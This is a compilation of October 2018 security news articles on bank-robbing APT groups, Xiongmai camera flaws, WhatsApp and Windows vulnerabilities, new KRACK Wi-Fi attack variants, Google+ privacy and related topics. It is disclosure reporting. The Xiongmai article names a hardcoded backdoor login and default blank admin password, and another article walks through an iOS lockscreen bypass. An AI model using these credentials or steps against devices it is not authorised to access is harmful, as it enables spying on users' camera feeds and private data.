Group-IB identifies 4 criminal APT groups that pose a real threat to the financial sector: not only are they able to penetrate a bank’s network and access isolated financial systems, but they can also successfully withdraw money via SWIFT, AWS CBR, card processing and ATMs. These groups are Cobalt, MoneyTaker, Silence, which are led by Russian-speaking hackers, and the North Korean group Lazarus.

Only two criminal groups pose a threat to the SWIFT interbank transfer system: Lazarus and Cobalt, the latter of which, at the end of 2017, conducted the first successful attack in the history of Russia’s financial sector on a bank using SWIFT. According to Group-IB estimates, the number of targeted attacks on banks to conduct thefts via SWIFT in the reporting period increased threefold. In the previous period, three such attacks were recorded: in Hong Kong, Ukraine, and Turkey. In this period, however, there have already been 9 successful attacks in Nepal, Taiwan, Russia, Mexico, India, Bulgaria, and Chile. The good news is that with SWIFT most of the unauthorized transfers can be stopped in time and returned to the banks affected.

Attacks on card processing remain one of the main methods of theft and they are actively used by hackers from Cobalt, MoneyTaker, and Silence. In February 2018, members of Silence conducted a successful attack on a bank and stole money via card processing: they managed to withdraw $522,000 (35 million rubles) from cards via the ATMs of a partner bank. Focusing attacks on ATMs and card processing led to a reduction in the average amount of damage from one attack. However, they allow attackers to conduct these attacks more securely for “drops” who cash out the stolen money. The attackers are in one country, their victim (the bank) in another, and the cashing out is done in a third country.

Withdrawing money through the AWS CBR (Automated Work Station Client of the Russian Central Bank) is actively used by MoneyTaker—in November 2017, they managed to withdraw $104,000 (7 million rubles), but in summer 2018, they successfully stole $865,000 (58 million rubles) from PIR Bank. MoneyTaker has already conducted 16 attacks in the US, 5 on banks in Russia, and 1 in the UK. In the US, the average amount of damage from one attack is $500,000. In Russia, the average amount of funds withdrawn is $1.1 million (72 million rubles). In December 2017, Group-IB published the first report on this group: “MoneyTaker: 1.5 Years of Silent Operations”.

In the designated period, only Cobalt conducted attacks on payment gateways. In 2017, they used this method to steal money from two companies; however, no attempts were made in 2018. They were helped in one of their attacks by members of the group Anunak, which had not conducted an attack of this kind since 2014. Despite the arrest of the gang’s leader in Spain in spring 2018, Cobalt continues to be one of the most active and aggressive groups, steadily attacking financial organizations in Russia and abroad 2-3 times a month.

Attacks on bank customers:

The decline of Android Trojans and the triumph of phishing

In Russia, according to Group-IB experts, there are no longer any groups left that conduct thefts from individuals using banking Trojans for PCs. This decline in threats from PC banking Trojans has been continuing in Russia since 2012.

At present, only three criminal groups—Buhtrap2, RTM, and Toplel—steal money from the accounts of legal entities in Russia. Group-IB experts noted a change in the attackers’ tactics in the second half of 2017: the vector for the distribution of Trojans was no longer the traditional malicious campaigns or hacked popular sites, but the creation of new tailored resources for accountants and company executives who use remote banking systems (RBSs), payment systems, or cryptocurrency wallets in their work. On the fake resources, the criminals placed code that was designed to download the Buhtrap and RTM Trojans.

Unlike in Russia, on the global stage, the cyber threat landscape has undergone far greater changes. Six new banking Trojans for PCs have emerged: IcedID, BackSwap, DanaBot, MnuBot, Osiris and Xbot. Among the new Trojans, we would like to highlight BackSwap, which initially only attacked banks in Poland, but then moved on to banks in Spain. BackSwap is interesting because it simultaneously implemented several new techniques of introducing code to automatically replace payment details. The greatest threat for bank customers still comes from criminal groups that use the Dridex, Trickbot, and Gozi Trojans.

Over the last year, Group-IB experts have noted a decline in Russia of the epidemic of infecting smartphones with Android Trojans, after several years of rapid growth. The number of daily thefts committed using Android Trojans in Russia decreased almost threefold, and the average amount of theft decreased from $164 to $104. New Android Trojans—Easy, Exobot 2.0, CryEye, Cannabis, fmif, AndyBot, Loki v2, Nero banker, Sagawa and others—that are put up for sale or hire on hacker forums are primarily intended for use outside of Russia. An exception to this is the malware Banks in Your Hand. The Trojan was disguised as a financial app intended to be used as an “aggregator” of the mobile banking systems of Russia’s leading banks. Every day, the Trojan stole between $1,500 and $7,500 from users; however, in March 2018, with Group-IB’s assistance, the criminals were detained by the police. Another cause of the reduction in damage to customers is that banks and payment systems have introduced early fraud detection technologies based on behavioral analysis algorithms, which can detect attacks that combine social engineering scams, phishing, botnets, illegal money withdrawal networks and fraud across multiple channels, as well as other types of banking fraud, on all customer devices and platforms.

There has been a significant rise in the number of crimes committed using web phishing and fake websites of banks, payment systems, telecoms operators, online stores and famous brands. Using web phishing, criminals have managed to steal $3.7 million (251 million rubles), which is 6% more than in the previous period. On average, approximately $15 are stolen in each phishing attack. According to Group-IB estimates, the number of groups that create phishing websites imitating Russian brands has increased from 15 to 26. As for global trends, as expected, the greatest number of websites for financial phishing are registered in the USA. They account for 80% of all financial phishing sites. France is in second place, followed by Germany.

Group-IB’s CEO, Ilya Sachkov, notes that to defeat cyber crime, we need to synchronize the law at state level, hit the economic base and funding channels of criminals, and introduce a moratorium on the development and sale of digital weapons that may end up in criminal hands.

“Cyber security must be a priority paradigm for people, business, and the state. It is thought that countering cyber threats is a typical competition of armor and equipment. This is why the protection paradigm itself has now changed: the main idea is to be a few steps ahead of the cyber criminals and stop crimes from happening in the first place.”


Millions of Xiongmai video surveillance devices can be easily hacked via cloud feature
10.10.2018 securityaffairs
Privacy

Millions of Xiongmai video surveillance devices can be easily hacked via cloud feature, a gift for APT groups and cyber crime syndicates
Security experts from security firm SEC Consult have identified over 100 companies that buy and re-brand video surveillance equipment (surveillance cameras, digital video recorders (DVRs), and network video recorders (NVRs)) manufactured by the Chinese firm Hangzhou Xiongmai Technology Co., Ltd. (Xiongmai hereinafter) that is vulnerable to attack.


Millions of devices are affected by security vulnerabilities that can be easily exploited by a remote attacker to take over devices. The flaws could be exploited to spy on camera feeds of unaware users.

The flaws reside in a feature named the “XMEye P2P Cloud” that is enabled by default which is used to connect surveillance devices to the cloud infrastructure.

“From a usability perspective, this makes it easier for users to interact with the device, since the user does not have to be in the same network (e.g. the same Wi-Fi network) in order to connect to the device. Additionally, no firewall rules, port forwarding rules, or DDNS setup are required on the router, which makes this option convenient also for non-tech-savvy users.” reads the report published by SEC Consult. “However, this approach has several security implications:

The cloud server provider gets all the data (e.g. video streams that are viewed). Open questions:
Who runs these servers?
Who controls these servers? Where are they located?
Do they comply with local jurisdiction?
Does the service comply with EU GDPR?

If the data connection is not properly encrypted (spoiler alert: it’s not, we’ve checked!), anyone who can intercept the connection is able to monitor all data that is exchanged.

The “P2P Cloud” feature bypasses firewalls and effectively allows remote connections into private networks. Now, attackers cannot only attack devices that have been intentionally/unintentionally exposed to the web (classic “Shodan hacking” or the Mirai approach), but a large number of devices that are exposed via the “P2P Cloud”.”

Each device has a unique ID, called cloud ID or UID (i.e. 68ab8124db83c8db) that allows users to connect to a specific device through one of the supported apps.

Unfortunately, the cloud ID is not sufficiently random or complex to make guessing valid cloud IDs hard: analysis of the Xiongmai firmware revealed that it is derived from the device’s MAC address.

According to SEC Consult experts, an attacker can therefore guess account IDs and access the feeds associated with other IDs.

Experts found many other security issues, for example, all new XMEye accounts use a default admin username of “admin” with no password and the worst aspect is that the installation process doesn’t require users to change it.

The experts also discovered an undocumented user with the name “default” and password “tluafed.”

“In addition to the admin user, by default there is an undocumented user with the name “default”. The password of this user is “tluafed” (default in reverse).” continues the analysis.

“We have verified that this user can be used to log in to a device via the XMEye cloud (checked via custom client using the Xiongmai NetSDK). This user seems to at least have permissions to access/view video streams.”

Experts also discovered that it is possible to execute arbitrary code on the device through a firmware update.

Firmware updates are not signed, which means that an attacker could carry out a MITM attack, impersonate the XMEye cloud and deliver a tainted firmware version.

Xiongmai devices were involved in IoT botnets in the last months, both Mirai and Satori bots infected a huge number of devices manufactured by the Chinese firm.

“We have worked together with ICS-CERT to address this issue since March 2018. ICS-CERT made great efforts to get in touch with Xiongmai and the Chinese CNCERT/CC and inform them about the issues. Although Xiongmai had seven months’ notice, they have not fixed any of the issues.”

“The conversation with them over the past months has shown that security is just not a priority to them at all.” concludes SEC Consult.


Hackers can compromise your WhatsApp account by tricking you into answering a video call
10.10.2018 securityaffairs
Hacking

Hackers can compromise your WhatsApp account by tricking you into answering a video call, the company fixed the flaw in September.
WhatsApp has addressed a vulnerability in its mobile applications that could have been exploited by attackers to crash a victim's instant messaging app simply by placing a call.

The vulnerability is a memory heap overflow issue that was discovered by Google Project Zero white hat hacker Natalie Silvanovich in August.

Natalie Silvanovich (@natashenka), 8:47 PM - Oct 9, 2018: "Memory corruption bug in WhatsApp's non-WebRTC video conferencing implementation https://bugs.chromium.org/p/project-zero/issues/detail?id=1654 …"

WhatsApp fixed the flaw on September 28, and Silvanovich has since published the technical details of the vulnerability.

The news of the flaw was also shared by popular Google researcher and bug hunter Tavis Ormandy.

Tavis Ormandy (@taviso), 8:52 PM - Oct 9, 2018: "This is a big deal. Just answering a call from an attacker could completely compromise WhatsApp."

Quoting Natalie Silvanovich (@natashenka): "Memory corruption bug in WhatsApp's non-WebRTC video conferencing implementation https://bugs.chromium.org/p/project-zero/issues/detail?id=1654 …"

Exploitation of the flaw was trivial: a malformed RTP (Real-time Transport Protocol) packet sent to a user as part of a call request could have been used to trigger the memory heap overflow and crash the application.

“This issue can occur when a WhatsApp user accepts a call from a malicious peer. It affects both the Android and iPhone clients.” reads the report published by Silvanovich.

An attacker could completely hijack a target’s WhatsApp account and spy on its conversations by simply video calling it.

Silvanovich published the proof-of-concept in the security advisory.

The latest versions of the popular instant messaging app for both Android and iOS include the fix for this vulnerability.


Microsoft Patches Windows Zero-Day Exploited by 'FruityArmor' Group
10.10.2018 securityweek
Vulnerability

Microsoft's Patch Tuesday updates for October 2018 resolve nearly 50 vulnerabilities, including a Windows zero-day flaw exploited by an advanced persistent threat (APT) actor known as FruityArmor.

The zero-day, tracked as CVE-2018-8453, has been described by Microsoft as a privilege escalation issue related to how the Win32k component of Windows handles objects in memory. The company says an authenticated attacker can exploit the security hole to elevate privileges and take control of the affected system.

According to Microsoft, the vulnerability has been actively exploited against older versions of Windows, but exploitation may also be possible on the latest versions of the operating system.

The flaw was reported to Microsoft by Kaspersky Lab, whose experts noticed the attacks exploiting CVE-2018-8453. Kaspersky will publish a detailed technical report on Wednesday, but the company told SecurityWeek that the vulnerability has been exploited by the FruityArmor group in a highly targeted campaign.

Interestingly, Microsoft's Patch Tuesday updates for October 2016 also addressed a Windows zero-day exploited by FruityArmor. That attack was also first observed by Kaspersky Lab.

Microsoft's latest updates also fix three vulnerabilities that were publicly disclosed before patches were made available, including a JET Database Engine issue for which an unofficial patch was released by 0patch.

The other disclosed flaws are a privilege escalation bug affecting the Windows kernel, and a remote code execution weakness impacting Azure IoT.

A dozen of the vulnerabilities addressed this month are critical. They impact Internet Explorer, Edge, Hyper-V, and XML Core Services.

One of the patches addresses CVE-2010-2190. This vulnerability was first resolved in 2010, but Exchange Server was not identified as one of the affected products at the time.

"This vulnerability affects all installations of Exchange Server. If you are running any version of Exchange server released prior to Exchange Server 2016 Cumulative Update 11 (as of this publishing, Cumulative Update 10 is the most recent cumulative update for Exchange 2016), the Visual Studio 2010 updates in MS11-025 should be applied to your Exchange Server," Microsoft explained in its advisory.

The remaining vulnerabilities have been classified as "important" – and a couple as "moderate" and "low" – and they impact Windows, SharePoint, Office, Edge, and SQL Server Management Studio.

"There was a total of 49 CVEs addressed across the portfolio," commented Chris Goettl, director of product management and security for Ivanti. "As expected, the majority, 33, were fixed in Windows 10, Edge, and the associated Server versions. Also, please note that there was an update for Server 2019 which was made generally available last week. Microsoft continued the trend from last month where they introduced both a monthly rollup and a security-only release for Server 2008. Prior to that there was only a single security update. Updates were released for all supported versions of Exchange Server and Sharepoint Server this month as well."


Apple Tells Congress Chinese Spy Chip Story Is False
10.10.2018 securityweek
Apple

The recent Bloomberg story claiming that Chinese spy chips made it into servers sold by California-based Super Micro is "simply wrong," Apple said in a letter sent on Monday to Congress.

The tech giant has denied claims that its servers were compromised and noted that its internal investigations have not found any evidence to support the Bloomberg report. The company also pointed out that some of the allegations from the article are based on a single anonymous source.

"While the story was being reported, we spoke with Bloomberg’s reporters and editors and answered any and all of their questions. We methodically dispelled the often-shifting nature of their claims. While we repeatedly asked them to share specific details about the alleged malicious chips that they seemed certain existed, they were unwilling or unable to provide anything more than vague secondhand accounts," wrote George Stathakopoulos, Apple's VP for information security.

"We were struck by the fact that the gravity and magnitude of the claims seemed to be undermined by their uncertainty around key details. Nevertheless, we worked tirelessly to ascertain whether these claims were true or, failing that, if anything even like them were true," he added.

Apple has denied finding any malicious chips or hardware manipulations, or contacting the FBI regarding such concerns, as claimed by Bloomberg.

The article describing the Chinese spy chips said the compromised devices were making outbound connections, and Apple is confident that its security systems would have detected this type of traffic.

According to Bloomberg, the Chinese government planted tiny chips in Supermicro motherboards in an effort to spy on more than 30 organizations, including government agencies and tech giants such as Apple and Amazon.

The report, based on information from 17 sources, claims that Chinese agents masquerading as government or Super Micro employees pressured or bribed managers at the Chinese factories where the motherboards are built. Once the chips were planted, they would allow attackers to remotely access the compromised devices.

Amazon and Super Micro have also strongly denied the claims, and their statements have been backed up by security agencies in the United States and the United Kingdom.

While some experts believe the attack described by Bloomberg is technically possible, others, including one of the people cited in the controversial article, have raised doubts.


Researchers KRACK Wi-Fi Again, More Efficiently This Time
10.10.2018 securityweek
Attack

Researchers who last year discovered security issues in the Wi-Fi Protected Access II (WPA2) protocol that made Wi-Fi networks vulnerable to an attack known as Key Reinstallation Attack, or KRACK, have just revealed more practical versions of the attacks.

KRACK, Mathy Vanhoef and Frank Piessens explained last year, could provide malicious actors within range of a victim with the ability to access information otherwise believed to be safely encrypted. Residing in the Wi-Fi standard itself, the bugs impact all implementations, including Android, Linux, Apple, Windows, OpenBSD, MediaTek, Linksys, and others.

Targeting several handshakes in the 802.11 standard, the KRACKs manipulate handshake messages to reinstall an already-in-use key, which results in nonce reuse and replay attacks, Vanhoef and Piessens explained last year.

In a new research paper (PDF) to be presented at the Computer and Communications Security (CCS) conference this month, the researchers detail improved KRACK variants and show how the countermeasures deployed last year can be bypassed.

The new attacks against the 4-way handshake have been generalized so that they no longer rely on hard-to-win race conditions, and they employ a more practical method to obtain a man-in-the-middle (MitM) position.

The researchers also reveal that the Fast Initial Link Setup (FILS) – which is not yet deployed in practice – and Tunneled direct-link setup PeerKey (TPK) handshakes are also vulnerable to key reinstallations and that the Wireless Network Management (WNM) power-save features can be abused to trigger reinstallations of the group key.

“Moreover, we bypass (and improve) the official countermeasure of 802.11. In particular, group key reinstallations were still possible by combining EAPOL-Key and WNM-Sleep frames. We also found implementation-specific flaws that facilitate key reinstallations,” the two researchers note.

Unlike the original attack, which relied on hard-to-win race conditions to trigger the key reinstallation, the new KRACK abuses power-save functionality of 802.11 to make the access point (AP) temporarily buffer a retransmitted message 3. The AP then sends retransmissions of message 3 encrypted under the newly negotiated session key.

“This encrypted message 3 will always be accepted by the client, even if it already installed the PTK. For example, unpatched versions of Android, macOS, and OpenBSD all accept the encrypted retransmitted message 3, and subsequently reinstall the session key,” the paper reads.

A multi-channel MitM position is required to perform a KRACK attack, which the researchers say can now be achieved by forging Channel Switch Announcements (CSAs) to trick clients into switching to the desired (rogue) channel. Previously, special equipment to jam certain channels was being employed, but the new method was successfully tested against Android and Chromium.

The researchers also discovered that it is possible to delay the delivery of message 3 after it has been captured (so the key reinstallation is no longer triggered immediately). More frames are therefore sent before the attack occurs, which increases its impact. The delay was successfully tested on Linux, Android, iOS, and macOS, and is also possible for encrypted messages.

“Our results show that preventing key reinstallations is harder than initially assumed. We believe the main reason vulnerabilities are still present is because the Wi-Fi standard is large, is continually being expanded with new features, and requires domain-specific knowledge to understand,” the researchers say.

“These obstacles can be overcome by having high-level descriptions (or formal models) of all security-related features of Wi-Fi. Additionally, we believe the Wi-Fi Alliance should not only test products for interoperability, but also fuzz them for vulnerabilities,” they also note.


KnowBe4 Brings Artificial Intelligence to Security Awareness Training
10.10.2018 securityweek
Security

It seems that you cannot have a new security product without a machine learning component. It makes sense. Machine learning recognizes patterns and returns probabilities. Risk (and cyber security is all about risk) is likewise a matter of patterns and probabilities. Binary security is beginning to look a bit old.

Now machine learning has entered security awareness training. Security awareness training firm KnowBe4 has added a Virtual Risk Officer (VRO), a Virtual Risk Score (VRS), and Advanced Reporting (AR) features to its security awareness training and simulated phishing platform.

"We've integrated a deep learning neural network that evaluates how risk changes over time within an organization," explains Stu Sjouwerman, CEO of KnowBe4, "which helps cybersecurity professionals measure how their security awareness program performs."

Traditional simulated phishing tells organizations which of their employees are deceived by a simulated phish, and which ones recognized it. On its own, it gives no real measure of the probability of the employees falling for a future -- perhaps malicious -- phish.

This is the purpose of the VRO and the VRS. The VRO helps the security team to identify risk at the user, group or organizational level. This makes future awareness training plans more relevant. The VRS highlights which groups are particularly vulnerable to social engineering attacks -- again allowing the security team to more finely focus its training.

Machine learning works by analyzing data and detecting patterns that would normally be missed by human analysts. KnowBe4's approach is to draw the raw data from five categories. These are breach history (has the user been exposed in a prior breach made publicly known); extent of training; the state of their 'phish-prone percentage' (which is a KnowBe4 measure of the user's fail points); the level of risk for their operational group (for example, working in finance would be a high risk level); and a booster feature that allows the security team to adjust for known risk factors.

Sjouwerman told SecurityWeek how this works. "Each user will have a Personal Risk Score. The risk score for an organization's groups and an organization is a calculation based on the Personal Risk Scores of all of the members of that group or organization."

That personal risk score, he continued, "is calculated by several different factors including how likely the user is to be targeted with a phishing or social engineering attack, how they will react to these types of events, and how severe the consequences would be if they fell for an attack."

For example, the Personal Risk Score of employees in an Accounting Department will be higher than those of employees in the Graphic Design Department, because an Accounting Department has access to sensitive financial data. "Similarly," he added, "a CEO or CFO will have a higher risk score than a Marketing Director, because the C-level executives may have access to classified or proprietary information about the organization."

The effect of KnowBe4's neural network is to bring together all of these different factors into a single metric: the virtual risk score that is based on more than just the user's phishing and training performance. The process is rounded off by KnowBe4's new Advanced Reporting feature. This, says the company, gives access to more than 60 built-in reports with insights that give a holistic view of the entire organization over time. Each report, which is now available immediately, gives visibility into the organization's security awareness performance based on trainings taken and simulated phishing data.

"Before AR and VRO," explains Sjouwerman, "the admin could see Phish-prone percentage and training but could not correlate those two items. AR allows the correlation and VRO takes that to the next level by also incorporating additional data such as user exposure and role within the organization."

Clearwater, FL-based KnowBe4 was founded by Stu Sjouwerman in 2010. It raised $30 million in Series B financing led by Goldman Sachs Growth Equity (GS Growth) in October 2017, bringing the total funding to date to $44 million.


Google Launch Event Overshadowed by Privacy Firestorm
10.10.2018 securityweek
Privacy

Google was supposed to be focusing Tuesday on its launch of a new smartphone and other devices, but the event was being overshadowed by a firestorm over a privacy glitch that forced it to shut down its struggling social network.

The Silicon Valley giant said Monday it found and fixed a bug exposing private data in as many as 500,000 accounts, but drew fire for failing to disclose the incident.

The revelation heightened concerns in Washington over privacy practices by Silicon Valley giants after a series of missteps by Facebook that could have leaked data on millions.

"In the last year, we've seen Google try to evade scrutiny -- both for its business practices and its treatment of user data," Senator Mark Warner said in a statement.

Warner said that despite "consent" agreements with the US Federal Trade Commission "neither company appears to have been particularly chastened in their privacy practices" and added that "it's clear that Congress needs to step in" for privacy protections.

Marc Rotenberg, president of the Electronic Privacy Information Center, said the latest breach suggests the FTC has failed to do its job in protecting user data.

"The Congress needs to establish a data protection agency in the United States," Rotenberg said. "Data breaches are increasing but the FTC lacks the political will to enforce its own legal judgments."

Rising tensions

The internet search leader had already faced tensions with lawmakers after it decided against sending its top executive to testify at a hearing on privacy and data protection, prompting the committee to leave an empty seat for the company.

Last month, Google indicated it would send chief executive Sundar Pichai to testify before Congress.

Google has also been in the crosshairs of President Donald Trump, who alleged that its search results were biased against conservatives, although there was little evidence to support the claim.

The rising tensions come with Google holding an event in New York widely expected to release its Pixel 3, the upgraded premium smartphone that aims to compete with high-end devices from Apple and Samsung.

The Pixel phone is part of a suite of hardware products Google is releasing as part of an effort to keep consumers in its mobile ecosystem and challenge rivals like Apple and Amazon.

On Monday, Google said it was unable to confirm which accounts were affected by the bug, but an analysis indicated it could have been as many as 500,000 Google+ accounts.

Google did not specify how long the software flaw existed, or why it waited to disclose it.

The Wall Street Journal reported that Google executives opted against notifying users earlier because of concerns it would catch the attention of regulators and draw comparisons to a data privacy scandal at Facebook.

Earlier this year, Facebook acknowledged that tens of millions of users had personal data hijacked by Cambridge Analytica, a political firm working for Donald Trump in 2016.

Google has also faced increasing tensions over a reported search engine which would be acceptable to Chinese censors, and over its work for the US military.

On Tuesday, Google confirmed it is dropping out of the bidding for a huge Pentagon cloud computing contract that could be worth up to $10 billion, saying the deal would be inconsistent with its principles.


Apple Patches Passcode Bypass in iOS
10.10.2018 securityweek
Apple

Apple on Monday released patches for iOS devices to address a recently disclosed vulnerability that could result in the bypass of the lockscreen.

The issue was found by iPhone enthusiast Jose Rodriguez, known for his YouTube channel “videosdebarraquito,” who revealed several other passcode bypass techniques in the past.

Exploitation requires both physical access to the device and for Siri to be enabled and Face ID to be disabled.

Once these conditions are met, an attacker can ask Siri to enable the VoiceOver accessibility feature that helps visually impaired individuals to use their Apple device by having the content of the screen and selected buttons read out to them.

The attacker can then call the locked device so that the “Messages” icon appears on the screen, to trigger a notification, and then bring up a white page with hidden buttons and functions. By abusing VoiceOver to cycle through the functions, the attacker can then access contacts and photos stored on the device.

The Cupertino-based tech giant has released iOS 12.0.1 to address the issue, which is actually the result of two vulnerabilities in the operating system.

Tracked as CVE-2018-4380, the first bug impacts VoiceOver. “A lock screen issue allowed access to photos and contacts on a locked device,” Apple notes in its advisory.

The second flaw, CVE-2018-4379, affects Quick Look: “A lock screen issue allowed access to the share function on a locked device,” Apple says.

Thus, the new platform update includes two patches, both available for iPhone 5s and later, iPad Air and later, and iPod touch 6th generation. To address the vulnerabilities, the patches restrict the options offered on a locked device.

Also on Monday, Apple released iCloud for Windows 7.7 to address 19 vulnerabilities in WebKit, including memory corruptions, arbitrary code execution, unexpected cross-origin behavior, script execution, and an ASSERT failure. The update is available for Windows 7 and later.


New Pentagon Weapons Systems Easily Hacked: Report
10.10.2018 securityweek
BigBrothers

New US weapons systems being developed by the US Department of Defense can easily be hacked by adversaries, a new government report said on Tuesday.

The Government Accountability Office said the Pentagon was unaware of how easy it could be for an adversary to gain access to the computer brains and software of the weapons systems and operate inside them undetected.

The weak points began with poor password management and unencrypted communications, it said.

But it said access points for the systems continued to grow in number and are not always well-understood by the operators themselves, leaving even non-networked systems deeply vulnerable.

More critically, the report faulted the US military for not incorporating cybersecurity into the design and acquisition process for the computer-dependent weapons, and said weapons developers often did not themselves adequately understand cybersecurity issues.

"Due to this lack of focus on weapon systems cybersecurity, DOD likely has an entire generation of systems that were designed and built without adequately considering cybersecurity," the GAO said.

"In one case, it took a two-person test team just one hour to gain initial access to a weapon system and one day to gain full control of the system they were testing," it said.

In another case, it said, the test team gained control of the terminals of the system's operators.

"They could see, in real-time, what the operators were seeing on their screens and could manipulate the system."

The public, unclassified version of the report did not identify which arms systems it had tested and found faults with, citing the need for secrecy.

But it said that between 2012 and 2017, the Defense Department's own testers "routinely" found dangerous cyber vulnerabilities in "nearly all" weapons systems under development.

"Using relatively simple tools and techniques, testers were able to take control of these systems and largely operate undetected. In some cases, system operators were unable to effectively respond to the hacks," it said.

The risk rises as Pentagon weapons and other systems are increasingly interconnected and their dependence on software and networking continues to rise.

The report came as the US government wrestles with what it sees as concerted efforts by government-backed hackers in Russia and China to permeate government and private sector computer networks to steal data or simply wreak havoc.


No Security Fixes in Patch Tuesday Updates for Flash Player
10.10.2018 securityweek
Vulnerability

The Patch Tuesday updates released this month by Adobe for Flash Player include no security fixes. The company did address several vulnerabilities in some of its other products.

Adobe informed customers that Digital Editions for Windows, Mac and iOS is impacted by nine vulnerabilities, including four critical memory-related bugs that can be exploited for arbitrary code execution. The remaining flaws have been rated "important" and they can result in information disclosure.

All the Digital Editions flaws were reported to Adobe by Jaanus Kääp of Clarified Security.

Kushal Arvind Shah of Fortinet’s Fortiguard Labs informed Adobe of DLL hijacking vulnerabilities that allow privilege escalation in the Technical Communications Suite and the Framemaker application. Both security holes have been rated "important."

In Experience Manager, Adobe patched several stored and reflected cross-site scripting (XSS) vulnerabilities that can result in the disclosure of sensitive information.

While no security fixes have been rolled out on Tuesday for Flash Player, that does not mean the application is 100% secure. In October 2017, Adobe released no Patch Tuesday updates, but one week later it issued an emergency fix for Flash Player to resolve a zero-day vulnerability that had been exploited in targeted attacks by a Middle Eastern threat actor.

The number of vulnerabilities found by researchers in Flash Player has decreased significantly after Adobe announced its intention to kill the application by 2020, but malicious actors are still looking for flaws they can exploit in their operations. A zero-day was exploited by hackers as recently as June.


Google Tightens Rules Around App Permissions
10.10.2018 securityweek
Incident

Google this week announced improved user control over data shared with apps, redesigned app permissions, and diminished app access to sensitive information such as contacts, SMS, and phone.

The changes, the search giant says, are being rolled out as part of Project Strobe, which represents an overall review of third-party developer access to Google account and Android device data. The idea was to have a look at privacy controls, data privacy concerns, and the access developers enjoy, and make adjustments where necessary.

The first and most important change resulting from Project Strobe is the shutdown of Google+ for consumers in August 2019. It is not surprising, given the low usage and engagement the social platform sees at the moment, with 90% of Google+ user sessions lasting less than five seconds.

While reviewing Google+ APIs, Google discovered a bug in one of the APIs, where apps would gain access to users’ profile fields that were not made public.

Such data includes optional Google+ Profile fields such as name, email address, occupation, gender and age, but does not include Google+ posts, messages, Google account data, phone numbers, or G Suite content. The flawed API was apparently used by up to 438 applications and the bug was fixed in March.

“We made Google+ with privacy in mind and therefore keep this API’s log data for only two weeks. That means we cannot confirm which users were impacted by this bug. However, we ran a detailed analysis over the two weeks prior to patching the bug, and from that analysis, the Profiles of up to 500,000 Google+ accounts were potentially affected,” Google says.

The company also claims that it has no evidence of developers being aware of the security flaw in said API. There is no evidence of profile data being misused either, the Internet giant notes.

“The review did highlight the significant challenges in creating and maintaining a successful Google+ that meets consumers’ expectations. Given these challenges and the very low usage of the consumer version of Google+, we decided to sunset the consumer version of Google+,” Google points out.

Another result of Project Strobe is the rollout of an improvement to Google’s API infrastructure, which starts with separately showing each and every permission that an app requests. Basically, each permission will get its own dialogue, so that users can allow or deny them individually.

Thus, developers are advised to review the Google API Services: User Data Policy, check the permissions the user has granted to their apps, request permissions only when they are needed, and provide justification before asking for access.

The changes, Google reveals, will start rolling out this month and will get extended to existing clients at the beginning of 2019. The Internet giant expects the move to increase transparency and trust in its app ecosystem.

Google is also updating its User Data Policy for the consumer Gmail API to limit the apps that may seek permission to access consumer Gmail data. Thus, only email clients, email backup services, and productivity services will be authorized to access this data.

These apps will also need to agree to new rules on handling Gmail data and will also be subject to security assessments, the company says. Set to go into effect on January 9, 2019, the new policies target how data must not be used, how it should be secured, and what data can be accessed.

“All apps accessing the Covered Gmail APIs will be required to submit an application review starting on January 9, 2019. If a review is not submitted by February 15, 2019, then new grants from Google consumer accounts will be disabled after February 22, 2019 and any existing grants will be revoked after March 31, 2019,” Google says.

The search giant is also limiting apps’ ability to receive call log and SMS permissions on Android devices, so that only the apps that have been set as the default apps for making calls or text messages could make these requests. Furthermore, contact interaction data is no longer available via the Android Contacts API, the company explains.

“Our goal is to support a wide range of useful apps, while ensuring that everyone is confident that their data is secure. By giving developers more explicit rules of the road, and helping users control your data, we can ensure that we keep doing just that,” Google concludes.


Researchers presented an improved version of the WPA KRACK attack
10.10.2018 securityaffairs
Attack 

Security researchers who devised last year the Key Reinstallation Attack, aka KRACK attack, have disclosed new variants of the attack.
Security researchers Mathy Vanhoef and Frank Piessens who devised last year the Key Reinstallation Attack against WPA, aka KRACK attack, have disclosed new variants of the attack.

Last year, the researchers discovered several key management flaws in the core of the Wi-Fi Protected Access II (WPA2) protocol that could be exploited by an attacker to break into Wi-Fi networks and eavesdrop on Internet communications, stealing sensitive information (i.e. credit card numbers, passwords, chat messages, emails, and pictures).

WPA2 itself was compromised: the flaws reside in the Wi-Fi standard, not in any one of the numerous implementations.

The KRACK attack allows attackers to decrypt Wi-Fi users’ data without cracking or knowing the password.

According to the researchers, the KRACK attack works against:

Both WPA1 and WPA2,
Personal and enterprise networks,
Ciphers WPA-TKIP, AES-CCMP, and GCMP.

The bugs impact all implementations, including Android, Linux, Apple, Windows, OpenBSD, MediaTek, Linksys, and others.

Now the experts have presented a new variant of the attack technique at the Computer and Communications Security (CCS) conference.

The new attacks no longer rely on hard-to-win race conditions and involve a new method to obtain the man-in-the-middle (MitM) position.

“First, we generalize attacks against the 4-way handshake so they no longer rely on hard-to-win race conditions, and we employ a more practical method to obtain the required man-in-the-middle (MitM) position.” reads the research paper.

“Second, we systematically investigate the 802.11 standard for key reinstallation vulnerabilities, and show that the Fast Initial Link Setup (FILS) and Tunneled direct-link setup PeerKey (TPK) handshakes are also vulnerable to key reinstallations. These handshakes increase roaming speed, and enable direct connectivity between clients, respectively. Third, we abuse Wireless Network Management (WNM) power-save features to trigger reinstallations of the group key.”


The experts explained that they achieved the multi-channel MitM position by forging Channel Switch Announcements (CSAs) to trick clients into switching to the desired (rogue) channel.

“We propose a more practical method to obtain the MitM, which works based on Channel Switch Announcements (CSAs). In this method, the adversary forges CSAs to trick clients into switching to the desired (rogue) channel [27, 46].” continues the paper. “This is more reliable than jamming certain channels, and does not require special Wi-Fi equipment. We successfully tested this approach against Android and Chromium.”

The security duo also discovered that it is possible to delay the delivery of message 3, which transports the group key to the client, after it has been captured. In this way, the key reinstallation is not triggered immediately, allowing the attacker to delay the attack and increase its potential impact.

The experts successfully tested the delay on Linux, Android, iOS, and macOS, and it also works with encrypted messages.

“Our results show that preventing key reinstallations is harder than initially assumed. We believe the main reason vulnerabilities are still present is because the Wi-Fi standard is large, is continually being expanded with new features, and requires domain-specific knowledge to understand,” the researchers conclude.

“These obstacles can be overcome by having high-level descriptions (or formal models) of all security-related features of Wi-Fi. Additionally, we believe the Wi-Fi Alliance should not only test products for interoperability, but also fuzz them for vulnerabilities,” they add.
